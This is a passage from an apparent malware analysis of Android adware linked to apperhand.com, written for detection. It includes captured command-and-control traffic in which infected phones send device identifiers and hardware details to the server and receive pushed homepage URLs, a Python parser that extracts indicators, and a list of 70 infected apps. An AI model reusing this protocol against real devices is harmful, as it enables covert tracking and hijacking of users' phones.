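HOMEPAGE_REQUEST = """POST /ProtocolGW/protocol/homepage HTTP/1.1
device-id: wCxwXphYj3JMoEasWcr%2BzmVQHjY%3D
protocol-version: 1.0.6
Host: www.apperhand.com

{"applicationDetails": {"abTests":null, "applicationId": "201460726", "build": {"brand": "generic", "device": "generic", "manufacturer": "unknown", "model": "sdk", "os": "Android", "versionRelease": "2.2", "versionSDKInt":8}, "developerId": "101785225", "deviceId": "wCxwXphYj3JMoEasWcr+zmVQHjY=", "displayMetrics": {"density":1.5, "densityDpi":240, "heightPixels":800, "scaledDensity":1.5, "widthPixels":480, "xdpi":240.0, "ydpi":240.0}, "locale": "en_US", "protocolVersion": "1.0.6", "sourceIp":null, "userAgent": "Mozilla/5.0 (Linux; U; Android 2.2; en-us; sdk Build/FRF91) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1"}, "parameters": {}}
"""

HOMEPAGE_RESPONSE = """HTTP/1.1 200 OK
Content-Type: application/json
Date: Tue, 17 Jan 2012 06:41:29 GMT

{"homepage": {"pageURL": "http://www.searchmobileonline.com/?sourceid=6&app=bg3ELZK%2FVVW4eFFdaD8qKARoih9CmK5ZfLxv4Ta%2FvI2vxAneCNgamcZxBXtWMfHi2c3yvRh1%2FCnH3N%2BnKvk91w%3D%3D"}, "abTest":null, "validResponse":true, "parameters": {}}
"""


def parse_http(raw: str):
    """Split a raw HTTP message into (start line, lower-cased headers, body)."""
    head, _, body = raw.strip().partition("\n\n")
    lines = head.splitlines()
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return lines[0], headers, body.strip()


def find_urls(obj):
    """Yield every string in a decoded JSON document that is an http(s) URL."""
    if isinstance(obj, dict):
        for value in obj.values():
            yield from find_urls(value)
    elif isinstance(obj, list):
        for value in obj:
            yield from find_urls(value)
    elif isinstance(obj, str) and obj.startswith(("http://", "https://")):
        yield obj


def summarize_exchange(request_raw: str, response_raw: str) -> dict:
    """What the client gave away and what the server told it to do."""
    start, req_headers, req_body = parse_http(request_raw)
    _, _, resp_body = parse_http(response_raw)
    request, response = json.loads(req_body), json.loads(resp_body)
    return {
        "endpoint": start.split()[1],
        "device_id": req_headers.get("device-id"),
        "reported_fields": sorted(request.get("applicationDetails", {})),
        "commands": [c["command"] for c in response.get("commands", [])],
        # The commands endpoint uses commandsInterval, commandstatus nextCommandInterval.
        "poll_interval": response.get("commandsInterval", response.get("nextCommandInterval")),
        "pushed_urls": list(find_urls(response)),
    }


if __name__ == "__main__":
    print(summarize_exchange(COMMANDS_REQUEST, COMMANDS_RESPONSE))
    print(summarize_exchange(HOMEPAGE_REQUEST, HOMEPAGE_RESPONSE))
```

The `pushed_urls` list is the part worth keeping as indicators: every URL the server sends back is one the infected phone will set as a homepage, bookmark or shortcut, and the `device-id` header gives the per-handset value to search for in proxy logs.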

Appendix 2

Here is a list of 70 infected apps on Android Market as of 2012/1/12:

App Name
Talking Allan Alligator Free
Talking Baby Boy Free
Talking Baby Dinosaur Free
Talking Baby Dragon Free
Talking Baby Eagle Free
Talking Barney Puma Free
Talking Beth Butterfly Free
Talking Betty Bee Free
Talking Bonnie Banana Free
Talking Brian Bread Free
Talking Cassie Cowfish Free
Talking Chad Chameleon Free
Talking Crazy Frog Free
Talking Dancing Dario Free
Talking Dan Snake Free
Talking Diddy Dog Free
Talking Don Donkey Free
Talking Droid Free
Talking Eddie Eagle Free
Talking Edward Egg Free
Talking Frannie Fairy Free
Talking Gary Gorilla Free
Talking Green Apple Free
Talking Harry Hen Free
Talking Johnny Corn Free
Talking June Pencil Free
Talking Katy Cow Free
Talking Ken Kangaroo Free
Talking Larry Lightbulb Free
Talking Lenny Leaf Free
Talking Leonard Tiger Free
Talking Lisa Ladybug Free
Talking Lolo Elephant Free
Talking Manny Monkey Free
Talking Mark Horse Free
Talking Matt Mushroom Free
Talking Michael Fish Free
Talking Moms Boy Free
Talking Oceana Octopus Free
Talking Orange Fruit Free
Talking Paulo Potato Free
Talking Paul Panda Free
Talking Pauly Pelican Free
Talking Pepe Penguin Free
Talking Planet Earth Free
Talking Pong Pig Free
Talking Prancer Reindeer Free
Talking Red Riding Hood Free
Talking Rick Rabbit Free
Talking Robby Ruler Free
Talking Rocky Rocket Free
Talking Rumba Robot Free
Talking Sammy Sting Ray Free
Talking Sam Sheep Free
Talking Santa Claus Free
Talking Santa Friends Free
Talking Sara Snail Free
Talking Sheila Seahorse Free
Talking Shelly Shell Free
Talking Simon Squirrel Free
Talking Soccer Ball Free
Talking Solar Sun Free
Talking Sonny Sunflower Free
Talking Star Fish Free
Talking Tina Tooth Free
Talking Tito Turtle Free
Talking TobbyTomato Free
Talking Tommy Thermometer Free
Talking Wally Woodpecker Free
Talking Wendy Worm Free